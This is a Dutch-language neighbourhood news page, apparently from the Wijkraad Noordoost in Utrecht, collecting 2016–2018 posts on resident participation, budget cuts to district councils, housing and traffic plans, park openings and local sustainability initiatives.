Op 7 november bent u welkom om mee te praten over de opgaven voor uw buurt. Afgelopen half jaar heeft het Wijkbureau Noordoost in samenwerking met de Wijkraad onderzoek gedaan naar behoeftes uit Utrecht Noordoost. We spraken met studenten, senioren, bezoekers van de Buurtcamping en bewonersorganisaties. Dit onderzoek is gebundeld in de voorlopige opgaven.

De gemeente wil op 7 november graag hierover in gesprek met u. Klopt het wat we zien in uw buurt? Ontbreken er onderwerpen? Praat mee en ontdek wat er al op de planning staat. De onderwerpen variëren van verkeer tot veiligheid.

Kom langs!. Laat u even weten of komt? Dit kan met een e-mail naar noordoost@utrecht.nl<mailto:noordoost@utrecht.nl>, vermeld daarbij in welke buurt u woont. U kunt hier terecht voor meer informatie over hoe wij samen Noordoost maken.

Facebooktwittergoogle_pluspinterest

21 november podiumgesprek over ‘Participatie in de Knel’

Wél meepraten en doen, niet beslissen!
Vinden Utrechters het wel goed zo of willen ze meer zelf bepalen?
Steeds meer Utrechters denken en doen enthousiast mee in de eigen buurt. Met vele uren wordt zelf een speeltuin gedraaid, een buurman geholpen of de straat schoon gehouden. Ook zijn er vele buurtbewoners in de wijkraden of in allerlei straatcomités, die veel tijd steken in het adviseren van de gemeente over hoe het nog beter kan. Veel Utrechters vinden dat ‘als je zelf actief meedenkt en doet, je ook meer zelf moet kunnen beslissen’. Dat lijkt niet het geval.

Het geld van het gemeentefonds voor buurtinitiatieven wordt als een subsidie door ambtenaren verdeeld. En het experiment met een buurtbudget waarmee bewoners zelf over de uitgaven mogen beslissen lijkt niet van de grond te komen. Meerdere buurthuizen en speeltuinen zijn succesvol in beheer genomen door buurtbewoners zelf. Maar het ondersteunen van bewoners(groepen) is door de gemeente toch weer uitbesteed aan een traditionele welzijnsorganisatie van buiten Utrecht en niet aan het alternatieve aanbod van Utrechtse buurtorganisaties. Daarnaast zijn veel Utrechters actief in het welzijn of in de informele (buurt)zorg. Maar de gemeente lijkt hier niet extra in te willen investeren.

Daarover gaat het Podiumgesprek op woensdag 21 november 2018. Over vragen als:
• Zijn er onderwerpen waar buurtbewoners niet alleen over mogen meepraten maar ook zelf over moeten kunnen beslissen?
• Is buurtbewoners zeggenschap geven altijd in conflict met onze gekozen gemeenteraad?
• Als buurtorganisaties succesvol het werk in de buurt uitvoeren, waarom doen we dat dan niet vaker?
• Of zijn de grenzen van de ‘participatiesamenleving’ bereikt en willen bewoners niet nog meer meepraten, meedoen en beslissen?

Tijdens het Podiumgesprek komt iedereen die dat wil aan het woord en hebben we respect voor elkaars mening en cultuur. Je bent van harte welkom op woensdagavond 7 november vanaf 19:00 uur in het ZIMIHC theater Stefanus (Braziliëdreef 2, Utrecht). Stadsbus 1 stopt er elke 10 minuten vlak voor de deur, halte Amazonedreef.

We beginnen om 19:45 en sluiten af om 21:30 uur. Voorafgaand aan het gesprek kun je ter plekke ook mee eten bij Resto VanHarte. Dan wel graag je daar apart voor aanmelden, via https://reserveren.restovanharte.nl/ Voor degenen die niet kunnen komen: Bij UStad is maandagavond 26 november een samenvatting van het Podiumgesprek terug te zien. Meld je aan!

Een andere link met info over Right To Challenge (om je gemeente uit te dagen als bewoner).

Facebooktwittergoogle_pluspinterest

Aanbieden kleurboek wijkraden aan wethouder

Maandag 24 september hadden de voorzitters van de Utrechtse wijkraden een eerste kennismaking met de nieuwe wethouder voor Wijkgericht Werken en Participatie, mevrouw Anke Klein. Sinds het aantreden van het nieuwe College van B&W is er discussie over de rol van de Wijkraden bij het zoeken naar nieuwe wegen om participatie in Utrecht vorm te geven.
Met het aanbieden van een KLEURBOEK willen de gezamenlijke wijkraden een bloemlezing tonen van het werk dat zij vrijwillig doen in en voor de stad. Vrijwillig maar niet vrijblijvend. De wijkraden zijn een bijzonder instrument van burgerparticipatie en hebben zich over verschillende onderwerpen in hun wijk uitgesproken.

De leden van de Wijkraden zijn niet gekozen maar wel proberen de wijkraden een zo goed mogelijke afspiegeling te zijn van de eigen wijk en oor en oog te hebben voor alle bewoners(groepen).
Alle wijkraadsleden hebben een grote en diverse achterban zodat ze weten wat er speelt in hun woonomgeving en zo een bijdrage te leveren aan de wijk en de stad. Elke wijkraad werkt anders, mede door de verschillende samenstelling en talenten van de wijkraadsleden. Deze diversiteit komt in de bloemlezing (bijgevoegd) tot uitdrukking.
De wethouder heeft in de bespreking een drastische bezuiniging op de Wijkraden aangekondigd. We willen nog bestuderen wat dit betekent voor het functioneren van de Wijkraden in Utrecht.

LINK naar KLEURBOEK WIJKRADEN UTRECHT

Facebooktwittergoogle_pluspinterest

Ontmoeten in Veemarkt

Sinds een aantal jaren is er op het voormalige Veemarktterrein een woonwijk gerealiseerd. Vanuit de gemeente afdeling Maatschappelijke ontwikkeling (MO) wil men de behoefte aan ontmoetingsplekken in kaart brengen van de bewoners Veemarkt e.o.

Binnen het project Kersvers hebben de studentbegeleiders Zina Hottentot en Daan van Gils deze behoefte onderzocht.

De resultaten van het onderzoek zijn inmiddels bekend en de samenvatting van het onderzoek kunt u hier lezen.

Facebooktwittergoogle_pluspinterest

Denk mee over gebruik van evenementenlocaties

Evenementen dragen bij aan levendigheid, maar moeten niet voor overlast zorgen. Daarom maakt de gemeente Utrecht samen met onder andere organisatoren en omwonenden, locatieprofielen. Hierin staan de mogelijkheden en regels voor het gebruik van een evenementenlocatie.

U kunt meedenken over het gebruik van enkele locaties. Denk hierbij aan het Griftpark, Maliebaan, Lucasbolwerk en Lepelenburg.

Meer informatie vindt u op de site van de Gemeente Utrecht.

Facebooktwittergoogle_pluspinterest

Positie wijkraden na coalitieakkoord

Het nieuwe college heeft in haar coalitieakkoord opgenomen dat nagedacht moet worden over de toekomst van de wijkraden (in het perspectief van nieuwe vormen van participatie). Ook is daarin een bezuiniging van €200.000 opgenomen. Dit heeft tot grote verbazing bij de wijkraden geleid omdat zij hierover niet zijn geïnformeerd. In de pers zijn een aantal berichten verschenen. Tevens hebben de wijkraden gezamenlijk een brief naar het nieuwe college gestuurd.

Na het overleg met alle 10 wijkraden van Utrecht is deze brief naar het nieuwe college gegaan.

Onderstaande berichten op diverse media spreken voor zich
23-06-2018 Wijkraden: ‘Subsidie mag pas omlaag zodra er een alternatief is’
21-06-2018 Wees een beetje lief voor de wijkraden nu ze er nog zijn
20-06-2018 Voorlopig nog geen alternatief voor wijkraden in Utrecht
19-06-2018 Nieuw coalitieakkoord lijkt nekslag voor Utrechtse wijkraden

Website van de gemeente met alle wijkraden
Website van de gemeente met adviezen van alle wijkraden

Facebooktwittergoogle_pluspinterest

De buurt heeft mooie plannen

In de buurten Lauwerecht/Staatsliedenbuurt in Utrecht-Noordoost komen er nu 800 woningen in de plaats van kantoren, zoals de gebouwen van de Belastingdienst en het UWV. De meeste woningen zijn bedoeld voor studenten en starters. Zo’n grote bouwactiviteit brengt veel vragen met zich mee. De Wijkraad Noordoost vindt de belangrijkste vraag:
“Hoe kunnen huidige en toekomstige bewoners een rol nemen in het adviseren van de gemeente en de bouwende partijen (waaronder MITROS) om tot een zo groot mogelijke kwaliteitsverbetering van het gebied te komen?”

Het Bewonersplatform Staatslieden/Lauwerecht heeft gisteren haar advies hierover aangeboden aan de wijkwethouder, Victor Everhardt, in buurthuis De Leeuw. Namens het Bewonersplatform zei Bart Smit dat men in juni 2017 is gestart met deze groep die inmiddels is uitgegroeid tot zo’n zestig betrokkenen. Tevens is een petitie opgesteld en overhandigd over enkele bouwplannen.

De Wijkraad Noordoost heeft over dit proces en resultaat een advies verstrekt aan het (nieuwe) College van Burgemeester en Wethouders met als belangrijkste gegeven:
– Een visie- en ambitiedocument voor deze buurt(en) op te stellen,
– In dialoog met bewoners en ondernemers, en er
– Een toereikend budget aan toe te kennen.
Wijkwethouder Everhardt gaf er blijk van in te zien dat nu de gemeente aan zet is. Hij wil zich inzetten voor een zo spoedig mogelijke reactie van het nieuwe College van B&W. Persoonlijk gaf hij aan een dergelijke dialoog heel belangrijk te vinden.

Facebooktwittergoogle_pluspinterest

Opening Park de Groene Kop

Afgelopen donderdag 15 maart is het nieuwe park De Groene Kop geopend.
Het gebied is gelegen tussen de Eykmanlaan, Winklerlaan, het volkstuinenpark de Driehoek en de spoorlijn Utrecht-Amersfoort. Het gebied is een overblijfsel van het weidegebied dat hier tot in de twintigste eeuw aanwezig was.

https://platform-duic.imgix.net/app/uploads/sites/2/2018/03/Park_de_groene_kop_4-1.jpg?auto=format&ch=Width%2CDPR%2CSave-Data&fit=max&ixlib=php-1.1.0&q=35

De voorzitter van de wijkraad, Ab Kools, heeft samen met de wethouder Geldof het park geopend. Zijn openingsspeech treft u hier aan. Meer informatie en foto’s leest u in DUIC.

Facebooktwittergoogle_pluspinterest

Theater van de Toekomst

Verschillende organisaties (onder meer: Wijk&Co, Buurtteam, Wijkbureau) willen u uitnodigen om op 22 maart 2018 van 16.00 uur tot 20.00 uur een kijkje te komen nemen bij het Theater van de Toekomst. Er is een mooi programma samengesteld voor en door de wijk met het oog op de toekomst.

Het theater van de toekomst biedt een kijkje in de mogelijkheden die er zijn om op een prettige manier langer in de wijk te blijven wonen. Naast een mooie theatervoorstelling van het STUT theater zijn er rondom vier thema’s informatie stands: Sociale netwerken, Informatievoorzieningen (online en offline), Gezondheid (fysiek en mentaal) en Wonen, Zorg en Domotica.

Voor meer informatie:

Kom ook de 22e!

Facebooktwittergoogle_pluspinterest

Bewonersavond Arkin aan de Wittevrouwenkade

Graag nodigt de gemeente u uit om met elkaar in gesprek te gaan over de nieuwe locatie van Arkin aan de Wittevrouwenkade. Burgemeester Jan van Zanen, wethouder Paulus Jansen en Arkin zijn die avond aanwezig. De bewonersavond vindt plaats op maandagavond 5 februari in de Lik aan het Wolvenplein 27.

Van 18.30 – 19.00 uur bent u welkom voor koffie/thee en een broodje.
Het programma start op 19.00 uur en om 20.30 uur ronden we de avond af.

Graag aanmelden. Stuur een mail met uw naam en aantal personen en of u een broodje mee wilt eten naar: wittevrouwenkade@utrecht.nl
Meer informatie vindt u op de site van de gemeente Utrecht.

Facebooktwittergoogle_pluspinterest

Bijeenkomst SamenNoordoost op 20 februari

Op 20 februari 2018 vindt de volgende netwerkbijeenkomst van SamenNoordoost plaats. Wij hopen dat u hierbij aanwezig kan zijn. De bijeenkomst is in Buurtcentrum de Leeuw van 15.00 tot 17.00.

Indien mogelijk horen wij graag van u of aanwezig kan zijn.
Op de agenda staan o.a.

 • Stand van zaken SamenNoordoost
 • Signalen uit de wijk
 • Bijeenkomsten Zin in Utrecht
 • Bijeenkomst 22 maart

Gonny van der Genugten-Buurtteam NO, Justin van Riel- Wijk&co NO en Reilif Bonse – Wijk&co NO Namens SamenNoordoost

Als u vanuit uw organisatie of als bewoner wat wil inbrengen dan kunt u hierover mailen via Reilif.bonse@wijkenco.nl

Facebooktwittergoogle_pluspinterest

Hoe maken we Utrecht Noordoost ‘waterproof’?

Heb je een idee voor de buurt, wijk of stad? En zijn meer mensen enthousiast? Denk dan eens aan het Initiatievenfonds van de gemeente. Honderden Utrechters kregen hiermee al de kans iets moois neer te zetten. Deze speciale uitgave van De Utrechtse Internet Courant (DUIC) aandacht voor een drietal ‘groene’ en ‘waterproof’ initiatieven in Noordoost.
Hoe maken we Utrecht ‘waterproof’? Drie projecten in Noordoost

Elk jaar valt er meer regen. Buiten de stad kan dat extra water zijn weg wel vinden, maar minder goed in de dichtbevolkte, verharde wijken van Utrecht. Gevolgen zijn ondergelopen kelders en overstroomde putten. In de zomer warmt de stad juist te veel op, doordat er te weinig groen en oppervlaktewater is om af te koelen. Met ‘Waterproof 030’ wil de Gemeente Utrecht de problemen aanpakken. De stad maakt werk van het verminderen van de hoeveelheid water die het riool inloopt en vermindert de verharde oppervlakte.

Lees voor de drie projecten in onze wijk verder op de site van DUIC.

Facebooktwittergoogle_pluspinterest

Raad in de wijk

Op 15 november is de gemeenteraad op bezoek geweest in de wijk Noordoost. De raad is in gesprek gegaan met de bewoners rondom het transformatiegebied Staatsliedenbuurt en Lauwerecht-Noord. Dit gebied is een stukje stad dat begrensd wordt door de Vecht, de spoorlijn, de Talmalaan, de Kardinaal de Jongweg en de Draaiweg.  Het is een nogal stenig gebied; na de verhuizing van gemeentelijke diensten naar het Stadskantoor staan er wat kantoorgebouwen leeg. De gemeenteraad is benieuwd welke kansen bewoners voor het transformatiegebied zien, en wat zij belangrijk vinden. Uit de reacties van de aanwezigen blijkt dat zij in elk geval meer openbaar groen willen. Het verslag van de avond is hier terug te lezen.

Onder leiding van projectleider Gwen van Mossevelde maakten Janita Satter en Monique Bollen een wandeling door het gebied. Vlogger Jelle de Boer registreerde het bezoek, zie zijn vlog:

Facebooktwittergoogle_pluspinterest

Nieuwe Mens en Wijk!

De nieuwe Mens en Wijk is er weer!
Met bijdragen van de wijkraad over de verkeerssituatie in Votulast en wat doet de gemeente met Bewonersparticipatie? En verder met Wobbelyoga, Rookvrij Sporten, de nieuwe Allure van de Eykmanlaan, alle kerstdiensten op een rij en Willem van Noortplein in de spiegel.

Binnen nu en een week ligt het blad op de mat (tenzij nee-nee sticker) of lees hem hier online.

 

Facebooktwittergoogle_pluspinterest

Ouderenverhuisadviseur voor Noordoost

Vorig jaar is de motie 2016/91 door de gemeenteraad aangenomen. Dit gaat over het instellen van een ouderenverhuisadviseur voor de wijk Noordoost. Alleen moest er nog gezocht worden naar financiering. Deze financiering komt er niet, zo bleek onlangs uit de brief van wethouder Paulus Janssen aan de gemeenteraad. De Wijkraad Noordoost reageert hierop met een brief aan de gemeenteraad .

De kern van de zaak is de vraag, of er een grote behoefte bestaat aan een verhuisadviseur voor ouderen in een koopwoning die kleiner willen gaan wonen maar wel in de eigen buurt? En, of die ouderen dat zelf kunnen betalen?

Facebooktwittergoogle_pluspinterest

Start winkelcentrum De Gaard

Op 27-10-2017 geeft wethouder Jansen het officiële startsein voor de bouw van “De Nieuwe Gaard” door het inhijsen van een duiker element. Alles bij elkaar heeft het bijna 10 jaar geduurd voordat er gestart kon worden. Als Wijkraad zijn we daar heel blij mee.
Toch met enige ‘mixed feelings’ vandaag vanwege het verdwijnen van wat beeldbepalende bomen, die in een andere vorm allemaal weer terug gaan komen. Ze maken ruimte voor de AH en het nieuwe profiel op de Eykmanlaan.
Op dit moment betreft het nog voorbereidingen, maar in het nieuwe jaar gaat het echt beginnen. Vanuit de buurt houdt de BLVC voor wat betreft bereikbaarheid, leefbaarheid, veiligheid & communicatie de vinger aan de pols.

Facebooktwittergoogle_pluspinterest

Meedenken in de wijk?

Park de Groene Kop, Winkelcentrum De Gaard, het nieuwe inzamelen, herinrichting De Biltstraat, leefstraten in Vogelenbuurt. Overal komen bewoners en gemeente elkaar tegen.

Op 10 oktober a.s. organiseert de wijkraad Noordoost een themabijeenkomst over wijkparticipatie in Noordoost in Eethuis de Helden. De deelnemers gaan aan de hand van voorbeelden uit Noordoost met elkaar in gesprek over beïnvloeding van gemeentelijk beleid, de kansen van bewonersinitiatieven en de rol die het Wijkbureau en de wijkraad kunnen vervullen. Kom ook en deel uw mening.

U bent van harte welkom. Graag even aanmelden via info@wijkraadnoordoost.nl
Hierbij de agenda voor die avond.

Facebooktwittergoogle_pluspinterest

Werksessies Verkeersroute Votulast

De gemeente onderzoekt samen met bewoners en ondernemers welke maatregelen nodig en/of gewenst zijn voor de verkeersroute door de Vogelenbuurt en omgeving (Votulast). Hiertoe is er in april een gebruikersonderzoek geweest (met 1.165 reacties), waren er vier inloopbijeenkomsten en heeft een kentekenonderzoek plaatsgevonden. De resultaten hiervan vormen – samen met het mobiliteitsbeleid van de gemeente – de basis voor de twee werksessies die de gemeente in juni organiseert.

 • Wanneer? Dinsdag 13 en 27 juni 2017
 • Hoe laat? Van 19.30 – 21.30 uur
 • Waar? Stadskantoor, Stadsplateau 1

De eerste werksessie gaat over de vraag hoe de hoeveelheid (doorgaand) verkeer omlaag zou kunnen. De tweede keer onderzoekt de gemeente met u welke mogelijkheden er zijn om de straten anders in te richten, zodat er meer ruimte ontstaat voor langzaam verkeer. Ook krijgt u de uitkomsten van het gebruikersonderzoek, het kentekenonderzoek en de inloopbijeenkomsten gepresenteerd. Uit de opbrengst van de onderzoeken, bijeenkomsten en de twee werksessies formuleert de gemeente een ambitiedocument over de toekomst van de verkeersroute Votulast.

Interesse? Meld u zich dan nu aan.

Er is plaats voor 40 belangstellenden. Als het aantal aanmeldingen voor de werksessies hoger is dan 40, dan stelt de gemeente de groep samen op basis van een representatieve verdeling over het gebied rond de route. Voor het beste resultaat is het wenselijk dat u beide keren aanwezig bent.

U kunt zich aanmelden door hieronder de gegevens in te vullen en deze mail uiterlijk woensdag 7 juni 2017 terug te sturen naar verkeersroute-votulast@utrecht.nl.

cid:image002.jpg@01D2D93D.6EBB3240

Facebooktwittergoogle_pluspinterest

11 juni GroenmoetjeDoen!-dag 2017: Groene Kennisdelen in Stad030

Op 11 juni wordt de 10de GroenmoetjeDoen!-dag/ dag vh Zelfbeheer030 gehouden.

De dag start om 12.00 met de opening door wethouder Openbare ruimte en Groen van Utrecht, Kees Geldof in de 30 jarige Bikkershof, een van de oudste zelfbeheertuinen van Utrecht. Vanaf 13.00 uur laten 40 zelfbeheerlocaties zien wat ze doen aan groenzelfbeheer, stadslandbouw, water, biodiversiteit en klimaatverandering. Op 15 locaties worden workshops verzorgd en kennis gedeeld over ecologisch maaibeheer, moestuin-stadslandbouw, groenzelfbeheer, plantenbakken in de wijk, waterplanten, maatschappelijkmeerwaarde van stadslandbouw, kinderen in het groen en crowdfunding.

De Waterweek van Utrecht Natuurlijk wordt tevens op die dag geopend. De dag wordt om 16.30 afgesloten bij Nieuw Rotsoord met een Initiatievencafé GroenmoetjeDoen! georganiseerd ism GroenmoetjeDoen!, Utrecht Natuurlijk en Stadsbedrijven.

Alle informatie treft u aan op: www.gmjd.nl en info@gmjd.nl
Ook kunt u de flyer van de GroenmoetjeDoen!-dag hier downloaden.

 

 

 

Facebooktwittergoogle_pluspinterest

Ontmoetingsplekken werken samen in Noordoost

Wethouder Kees Diepeveen ontvangt zondag 7 mei de eerste gezamenlijke activiteitenagenda van verschillende bewonersinitiatieven in Noordoost. Zo kunnen (oudere) wijkbewoners beter zien aan welke activiteiten zij kunnen deelnemen. Onder het motto ‘Samen Thuis in de Wijk’ zijn wijkbewoners zelf gaan samenwerken.

Datum:                  Zondag 7 mei
Plaats:                   Verenigingsgebouw Ons Buiten, Pal Maleterstraat 64
Tijd:                      15.30 uur (inloop 15.00 uur)

Het betekent dat wijkbewoners die activiteiten in ontmoetingsplekken organiseren, met elkaar samenwerken. Zijn er in een wijk bijvoorbeeld twee eetclubs, dan kunnen zij de dagen op elkaar afstemmen. Door hun activiteiten niet op dezelfde dag te doen, krijgen zij meer deelnemers én voor wijkbewoners zijn er op meer dagen mogelijkheden om samen te eten. En als bewoners een koffieochtend willen organiseren, kunnen zij dat doen op een dag dat er niet nog zo’n activiteit in de wijk is.
In de wijk Noordoost zijn ontmoetingsplekken als eerste een samenwerking aangegaan. Het gaat om De Leeuw, Griftsteede, Pauluskerk, Tuindorpkerk, Nieuws Bleyenburg, Ons Buiten, De Driehoek, De Pionier en Tuindorp-Oost. Het plaatsen van alle activiteiten in een gezamenlijke agenda voor de buurt, is de eerste maar belangrijke stap. Hiermee hebben (oudere) wijkbewoners in Noordoost een compleet beeld van wat er in hun wijk te doen is. Het gaat om activiteiten die voor iedereen toegankelijk zijn.

Voor ouderen is het essentieel om actief blijven in de wijk. Als gevolg van veranderingen in de zorg wonen mensen langer thuis. Contacten (onder)houden kan eenzaamheid tegengaan. In veel wijken is al een Huiskamer van de Wijk waar mensen kunnen binnenlopen voor een kop koffie. Maar zij kunnen ook deelnemen aan allerlei activiteiten die veelal door bewoners zelf zijn ontwikkeld. ‘Samen Thuis in de Wijk’ komt hier uit voort. Dergelijke samenwerkingen komen ook in de wijken Hoograven, Kanaleneiland, Overvecht, Leidsche Rijn, Vleuten en De Meern.

De organisaties die het initiatief namen voor Huiskamer van de Wijk (AxionContinu, Careyn, Doenja Dienstverlening, De Rijnhoven, U-centraal  en Welzaam) zijn erg verheugd dat wijkbewoners de regie nemen.

Facebooktwittergoogle_pluspinterest

Stichting BuurtWelzijn verbindt!

Stichting BuurtWelzijn zet zich in om buurtbewoners met elkaar te verbinden. Dit doen wij onder andere met de gratis buurtwebsite www.mijnbuurtwelzijn.nl, waarop activiteiten, nieuwtjes en vraag en aanbod geplaatst kunnen worden. Dit kan ook voor onze wijk, Noordoost!

Denk aan bijvoorbeeld de vraag voor hulp bij het boodschappen doen. Zo blijft u op de hoogte van wat er in de buurt speelt. Daarnaast zijn wij ook fysiek actief, waardoor het ook voor minder digitale bewoners bereikbaar is. Zoals de activiteit filosoferen met ouderen of computercursussen. Momenteel zijn wij bezig met het betrekken van 65-plussers in deze buurt. Hierbij doen wij ook een onderzoek of een website als van BuurtWelzijn een meerwaarde kan zijn voor senioren.

Bent u 65 of ouder en wilt u ons helpen? Neem dan contact op met Anne van Leeuwen via a.leeuwen@buurtwelzijn.org of bel 06-14498149. Samen met u werken wij aan een betrokken, gezellige buurt voor iedereen!

Facebooktwittergoogle_pluspinterest

OPROEP BEWONERSPLATFORM OMGEVING LAUWERECHT/STAATSLIEDENBUURT

Al lange tijd is het een zorg van de wijkraad of en hoe de buurten Lauwerecht en Staatsliedenbuurt zich kunnen ontwikkelen. Er is veel nieuwbouw gepleegd in de afgelopen jaren en ook nogal wat renovatie. De winkels op de Merelstraat hebben het moeilijk (gehad) en ontmoeting van oude en nieuwe bewoners verloopt naar ons idee nog enigszins moeizaam.

Vrijwel ieder jaar houdt de wijkraad Noordoost een raadpleging van (een deel van) zijn achterban over een – op dat moment – belangwekkend onderwerp. Dit jaar hebben we speciale aandacht voor deze buurten, twee van de elf in onze wijk Noordoost. Afgelopen jaar betrof het de Veemarkt.

Vanaf 2017 staan er hier grote bouwplannen op stapel en een ermee gepaard gaande herinrichting van de openbare ruimte. Het gaat om een toevoeging van tenminste 800 woningen met een gemengde bewoning waaronder veel studenten en starters op de woningmarkt. Er is enige tijd geleden deur-aan-deur een folder verspreid door de gemeente met een schets van deze plannen.

Zo’n grote bouwactiviteit brengt vele vragen met zich mee, en vooral de vraag: hoe kunnen huidige en eventueel ook toekomstige bewoners een rol nemen in het adviseren van de gemeentelijke diensten en de bouwende partijen om tot een zo groot mogelijke kwaliteitsverbetering van het gebied te komen?

We starten in april met een bewonersplatform, opererend vanuit Buurtcentrum De Leeuw, en bestaande uit ongeveer 8 tot 10 personen. Liefst zoveel mogelijk gespreid in het gebied; uit oud- en nieuwbouw, mannen en vrouwen, jongeren en ouderen die zich hiervoor belangeloos willen inzetten.

We komen veertiendaags bijeen met deze groep en stellen gezamenlijk de te behalen doelen/resultaten vast. Doe mee met deze bewonersgroep en laat uw stem horen. De Wijkraad ondersteunt deze groep met begeleiding, en (interne en externe) communicatie.
– In december 2017 stellen we gezamenlijk een eindrapportage op van beleving en adviezen van deze maanden.
– Het eindrapport wordt aangeboden aan het College van Burgemeester en Wethouders in de persoon van wijkwethouder Everhardt.
– Wanneer de groep ervoor kiest om hierna verder te gaan met zijn taak zal dat gerealiseerd moeten kunnen worden.

Heeft u interesse? Meld u aan via de site!

Facebooktwittergoogle_pluspinterest

Stadsboerderij Het Lachende Paard start Crowdfunding

Stichting Het Lachende Paard is op 8 april gestart met Crowdfunding campagne “Dak voor de Dieren!”. Met die campagne wil de stichting een bedrag van 4.100 euro ophalen voor een nieuw dak op de stal. Zodat ook de volgende winter de dieren een knusse en droge slaapplek hebben.
Doneren kan via www.voorjestadsie.nl/hetlachendepaard

De campagne ‘Dak voor de Dieren’ is gestart om te zorgen dat ook de volgende winter de dieren lekker droog in hun stalletje kunnen slapen. Wind en regen is iets waar ezels Anna en Linda en ook de geiten niet dol op zijn. Wanneer het begint te regenen rennen ze snel hun stal in, doen daar een dutje of kijken half slapend door de deur naar de regen buiten. Alle dieren bij stadsboerderij Het Lachende Paard kiezen zelf wanneer ze binnen of buiten zijn. De stichting vindt dat dat zo moet blijven en zamelt daarom geld in voor een nieuw dak. Om de verrotte balken en lekkende dakplaten te vervangen is een bedrag van 4.100 euro nodig.


Het Lachende Paard ligt in Tuindorp-Oost, tussen Careyn Tuindorp-Oost en het Ecologisch Tuinenpark De Driehoek in. De stadsboerderij bestaat al meer dan tien jaar. Zoals de naam al doet vermoeden lopen er paarden, maar er wonen ook ezels, geiten, schapen en kippen. Nieuwsgierig naar de plek? Kom langs tijdens de open dag op 29 april en maak kennis met de mensen en dieren van Het Lachende Paard.

Facebooktwittergoogle_pluspinterest

Voordorp duurzamer in 2017

Op 9 februari was er weer een VvE energie bijeenkomst bij Tuinenpark Ons Buiten en op 21 februari zijn de plannen ook toegelicht bij de vergadering van Wijkraad Noordoost. Christian Naethuys en Sander Ekstijn (beide bewoners van Voordorp en lid van de Wijkraad) hebben versterking gekregen van Energie-U in de persoon van Corien van den Haak. Zo komt er meer kennis over verduurzamen en zonnepanelen vanuit heel Utrecht bij het team terecht. In Voordorp zijn ondertussen twee VvE’s die hun dak ‘beschikbaar hebben gesteld’ voor zonnepanelen. Een volgende stap is om de invulling van dat dak te gaan regelen met het opvragen van offertes en het vastleggen van de spelregels voor leden van de VvE. Er is dus beweging!

Voordorp kan zich mooi gaan spiegelen aan de Veemarkt, met 25 jaar technologische & maatschappelijke voorsprong. In de presentatie op 9 februari was te zien welke alternatieven er nog meer zijn zoals met buurtstroom en hoe je die alternatieven betaald kunt krijgen! Ook leverde het ideeën op om na te denken over alternatieven voor de CV-ketels in de richting van warmtepompen om op termijn ‘van het gas af te gaan’.

Leuke nieuwe ontwikkelingen in Voordorp en Veemarkt zijn verder het beschikbaar komen van meer elektrische deelauto’s. Op de Veemarkt staat al de eerste, maar met twee initiatieven worden dat er snel meer. Via “We Drive Solar” (Renault ZOE met effectief 300km bereik) komt er zeker al één extra en de intentie is om via “De Testrijders” (VW e-Golf met effectief 200km bereik) er ook minimaal één naar Voordorp te krijgen.

Niet meer dromen, maar samen realiseren! Dat was het motto van de dak conferentie 2017 met de titel ‘Het dak van Utrecht geeft energie!’ op 15 februari. Dat eindigde met het ondertekenen van een manifest met vrij ambitieuze doelstellingen, maar niet onrealistisch. Het gaat dan om sneller meer verduurzaming te behalen (10% daken met zonnepanelen in 2020). Mede ondertekenaars waren ‘Energie-U’, ‘Buurtstroom’ en ‘Groot dak zoekt zon’ (in totaal bijna 70 Utrechtse organisaties).

NB meer documenten zijn te vinden op website van Voordorp Op Eigen Kracht

Facebooktwittergoogle_pluspinterest

Aanbieden eindrapport Buurtgesprek Veemarkt 2016

Op dinsdag 21 februari 2017 tijdens de reguliere wijkraad vergadering is het eindrapport van het Buurtgesprek Veemarkt 2016 aangeboden aan wethouder Victor Everhardt. Het is de uitkomst van de wijkraadpleging die elke wijkraad mag doen op een bepaald thema dat ze belangrijk vinden om nader te onderzoeken.

Lees met deze link het volledige rapport.

Samenvatting

Facebooktwittergoogle_pluspinterest

89 KAMERBEWONERS IN DE LICHTKRING?

Wooncorporatie MITROS heeft onlangs het bezit van De Lichtkring (Eijkmanlaan) overgenomen van VESTIA. Vrijwel meteen zijn er plannen bekend gemaakt om hier 89 sociale huurwoningen te realiseren. Onze verwachting was dat het onpraktische en gedateerde gebouw zou worden afgebroken en vervangen door moderne bouw. Prima als dat sociale woningbouw zou zijn, mits de van toepassing zijnde beheersverordening dat toestaat. Het zal nu toch niet gebeuren dat een beeldbepalend gebouw in onze wijk een nieuwe bestemming krijgt in een eentweetje van gemeente en MITROS zonder zelfs maar alternatieven te wegen?

Dat van de bestaande zorg-kamertjes met enkele sanitaire aanpassingen evenveel ‘woninkjes’ van 24 m2 worden gemaakt is wat ons betreft niet wenselijk. Dit is te massaal, te primitief en zonder voldoende flankerende voorzieningen, zoals parkeren. Het is zelfs in strijd met de geest van de door de wethouder eerder gemaakte afspraken over splitsen van gebouwen in eenheden niet kleiner dan 27 m2.

In mondelinge vragen in de gemeenteraad door D66/PvdA is bij wethouder Paulus Jansen erop aangedrongen in gesprek met de buurt tot een invulling van het pand te komen die past bij het karakter van de buurt. Voorts heeft de wijkraad de omwonenden geadviseerd de rechter te laten toetsen of hier sprake is van een correcte invulling van de beheersverordening. 

Facebooktwittergoogle_pluspinterest

Inloopavond Monicabrug 12 december

Op 12 december organiseert de gemeente Utrecht een inloop informatieavond over de knijp bij de Monicabrug. Bewoners kunnen tijdens deze avond terecht met vragen over het eindrapport van de knijp Monicabrug die de effecten van de knijp beschrijft en het vervolg met betrekking tot verkeer.  

Wanneer: maandag 12 december 2016
Hoe laat: vanaf 19:30 tot 21:30. 
Waar: Het Huis Utrecht, Boorstraat 107, Utrecht. 

U kunt het rapport vinden op: utrecht.nl/monicabrug

 

Facebooktwittergoogle_pluspinterest

Fietsroute Overvecht – Utrecht Science Park

Utrecht wil de stad op een gezonde manier laten groeien en wil onder andere door het fietsgebruik te stimuleren door bv het aanleggen van fietsparkeerplaatsen en stallingen, maar ook door comfortabele fietsroutes aan te leggen die de verschillende wijken van de stad met elkaar verbinden. Een belangrijke fietsroute loopt van Overvecht naar het Utrecht Science Park (de Uithof) via de  Adriaen Beyerkade, Pieter Nieuwlandstraat, Van Esveldstraat, Jan van Galenstraat, Huizingalaan en Karel Doormanlaan.

De gemeente pakt de fietsroute stap voor stap aan. Fietspaden worden verbreed, er komen fietsstraten waar de auto te gast is, met zo min mogelijk obstakels én voorrang voor de fietsers.

Voor de buurtbewoners zijn inloopavonden georganiseerd om mee te denken.

Informatieavond Huizingalaan en Karel Doormanlaan
Datum: donderdag 08-12-2016
Tijdstip: 19:00-21:00 uur
Locatie: Wijkcentrum de Helden, Jan van Galenstraat

Inloopavond Van Esveldstraat Pieter Nieuwlandstraat
Datum: woensdag 14-12-2016
